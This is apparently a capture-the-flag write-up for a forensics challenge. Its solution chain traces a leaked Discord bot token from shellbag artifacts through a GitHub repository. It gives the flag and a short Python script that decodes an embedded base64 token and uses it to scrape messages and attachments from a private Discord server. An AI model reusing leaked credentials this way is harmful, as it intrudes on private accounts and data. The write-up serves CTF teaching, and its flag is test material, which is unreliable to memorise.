# impersonator-1

Description:

```
Some dumb college student thought he was leet enough to try and hack our university using a school computer.
Thankfully we were able to stop the attack and we confiscated the equipment for forensic analysis.
Can you help us figure out what their next moves are?
Flag is in the format dam{flag}
```

Flag:

```
dam{Ep1c_Inf1ltr4t0r_H4ck1ng!!!!!!1!}
```

## Solution

Shellbag forensic artifact -> git folder -> github repo -> leaked discord bot token -> write bot to scrape messages from private discord server using token -> flag is in attachment

```py
import discord
import base64

client = discord.Client()

@client.event
async def on_ready():
    print(client.guilds)
    print(client.guilds[0].channels)
    messages = client.guilds[0].channels[3].history(oldest_first=True)
    async for m in messages:
        print(m.author)
        print(m.content)
        print(m.attachments)

token = base64.b64decode(b'T0RReU1qUTNPRFl6TWpVek56STVNamt3LllKeWljZy43S0c5MzRWRWxtM1J0Wm45YlVhQ0xTdnJPeUk=').decode()
client.run(token)
```
